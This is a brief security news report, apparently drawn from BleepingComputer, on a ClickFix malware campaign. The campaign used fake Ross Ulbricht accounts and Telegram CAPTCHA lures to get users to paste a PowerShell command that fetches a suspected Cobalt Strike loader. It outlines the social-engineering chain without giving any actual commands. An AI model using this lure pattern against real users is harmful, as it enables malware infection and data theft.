Recent developments surrounding dark web market Silk Road founder and operator Ross Ulbricht, who was pardoned by President Donald Trump on Wednesday, have been leveraged by threat actors to launch a new ClickFix attack campaign that spread malware via Telegram CAPTCHAs, BleepingComputer reports.Attackers who made fraudulent but verified Ross Ulbricht accounts on X, formerly Twitter, sought to lure users into joining Telegram channels purporting to be Ulbricht portals, which provided a walk through on the bogus Safeguard identity verification process leading to a Telegram mini app with a hoax verification dialog, which deceives targets into pasting an automatically copied PowerShell command in the Windows Run dialog. Executing the PowerShell script prompts the download of a ZIP file with a suspected Cobalt Strike loader, which could be leveraged for ransomware and data exfiltration activities. Such a development follows a recent malvertising campaign reported by Guardio Labs and Infoblox to have involved the exploitation of CAPTCHA verification for PowerShell command execution.
